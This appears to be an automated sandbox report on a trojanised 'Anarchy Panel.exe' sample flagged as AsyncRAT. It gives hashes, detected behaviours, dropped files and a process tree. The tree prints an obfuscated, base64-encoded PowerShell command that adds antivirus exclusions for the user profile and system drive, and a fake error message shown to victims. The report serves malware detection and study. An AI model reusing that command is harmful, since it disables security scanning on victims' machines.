Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-07-2024 14:08

General

  • Target

    Anarchy Panel.exe

  • Size

    60.8MB

  • MD5

    c0eb5b0616dad08c48a21f840bf9e2bc

  • SHA1

    f41c0747386053e1eb32d710d360a08c35de10c2

  • SHA256

    d13fc809b467a28598451093bff3f9649a96082e041e775f174c55d5eadd7cc5

  • SHA512

    bfdf7ed57ab450f19748b207ab542136a9c836c4ad174fbf507df3aae7a69acb710a0d66a85d5ec6a6c6b23363fd6ef559a0096d12fbfa322cb4970f4db572b4

  • SSDEEP

    1572864:nWEhJfOrr878YLP5X3xCZubIX6+3gl7Mqui:xJfE+rP5HS2h9o

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 2 IoCs

    Adversaries may gather the system time and/or time zone settings from a local or remote system.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe
    "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAagByACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1452
    • C:\Windows\windowssdk.exe
      "C:\Windows\windowssdk.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1636 -s 64
        3⤵
        PID:2180
    • C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe
      "C:\Users\Admin\AppData\Local\Temp\AnarchyBuilder.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c start cmd /C "color b && title Error && echo SSL assertion fail, make sure you're not debugging Network. Disable internet firewall on router if possible. & echo: & echo If not, ask the developer of the program to use custom domains to fix this. && timeout /t 5"
        3⤵
        • System Time Discovery
        • Suspicious use of WriteProcessMemory
        PID:2928
        • C:\Windows\system32\cmd.exe
          cmd /C "color b && title Error && echo SSL assertion fail, make sure you're not debugging Network. Disable internet firewall on router if possible. & echo: & echo If not, ask the developer of the program to use custom domains to fix this. && timeout /t 5"
          4⤵
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:1692
          • C:\Windows\system32\timeout.exe
            timeout /t 5
            5⤵
            • Delays execution with timeout.exe
            PID:772

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab3545.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar35B5.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Windows\windowssdk.exe

      Filesize

      6.2MB

      MD5

      e58b6dba9e96f3f015010a7796676153

      SHA1

      bae94a6035fe295f803c12b7dbc85cac2bf120a0

      SHA256

      9e8a91ecf50a0e4d9cda2f80380345d8edba197551a2bc5c797cb43007fd8181

      SHA512

      1b357abde0a7fa9dca1e4cb1d15f250800bedf80faa25b8b211f51527484af392ae9d6b47fa6c512eea42124f523654ba92ac6e40aa15fc71d5c98cbfbbdbe59

    • \Users\Admin\AppData\Local\Temp\Costura\C5730A4C0FDD612A5678E51A536CE09E\64\sqlite.interop.dll

      Filesize

      1.7MB

      MD5

      56a504a34d2cfbfc7eaa2b68e34af8ad

      SHA1

      426b48b0f3b691e3bb29f465aed9b936f29fc8cc

      SHA256

      9309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961

      SHA512

      170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7

    • memory/1636-5-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

    • memory/1636-110-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

    • memory/1636-24-0x000000013FE70000-0x00000001405F7000-memory.dmp

      Filesize

      7.5MB

    • memory/2088-4-0x0000000006D00000-0x0000000007487000-memory.dmp

      Filesize

      7.5MB

    • memory/2692-23-0x000000001FA40000-0x000000001FE00000-memory.dmp

      Filesize

      3.8MB

    • memory/2692-26-0x000000001E620000-0x000000001E634000-memory.dmp

      Filesize

      80KB

    • memory/2692-25-0x0000000020760000-0x00000000208AE000-memory.dmp

      Filesize

      1.3MB

    • memory/2692-22-0x000000001F450000-0x000000001FA38000-memory.dmp

      Filesize

      5.9MB

    • memory/2692-17-0x00000000008D0000-0x0000000003F6E000-memory.dmp

      Filesize

      54.6MB